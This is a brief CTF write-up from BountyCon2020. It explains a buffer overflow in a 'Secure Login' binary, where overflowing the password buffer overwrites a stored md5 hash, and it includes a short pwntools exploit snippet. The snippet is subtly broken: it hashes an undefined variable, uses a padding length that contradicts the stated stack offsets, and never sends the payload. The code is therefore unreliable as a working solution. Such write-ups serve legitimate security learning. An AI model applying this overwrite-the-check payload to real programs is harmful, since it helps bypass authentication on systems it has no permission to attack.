The BountyCon2020 CTF is sponsored by Facebook and top 20 people from APAC region will be invited to the invitation-only conference in Singapore.
I solved all the challenges in the CTF and I really enjoyed playing it, and I am invited to the Conference.
1. Secure Login
Its an easy binary exploitation challenge, binary asks for the password and the comparison is like
md5(password) == "hash". We can't crack the hash, though you can find collisions for md5 with reasonable time. There is a buffer overflow in the password buffer and hash is consecutive to the password buffer, for example
password buffer is at
rbp-0x58 and hash is at
rbp-0x30, as there is an overflow in password buffer we can overflow the hash.
from pwn import *
from hashlib import md5
p = remote("localhost",10000)
# p = remote("ec2-3-11-37-224.eu-west-2.compute.amazonaws.com",10000)
payload = 'a'*0x81 + md5(dat).digest()
I expected few more binary exploitation challenges, but this is the only challenge given